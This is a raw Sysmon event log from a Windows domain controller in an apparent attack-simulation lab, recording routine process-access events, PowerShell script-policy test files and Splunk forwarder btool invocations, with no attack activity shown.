12:01:05.440{266CAFBE-6481-6064-5900-00000000AE01}4012\PSHost.132616656653718688.4012.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-6481-6064-5900-00000000AE01}4012NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_jmrktbre.2tj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.440{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5B00-00000000AE01}40324036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.439{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5900-00000000AE01}4012NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_0kjz5n41.ayo.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5A00-00000000AE01}38323836C:\Windows\system32\cmd.exe{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.431{266CAFBE-6481-6064-5B00-00000000AE01}4032C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 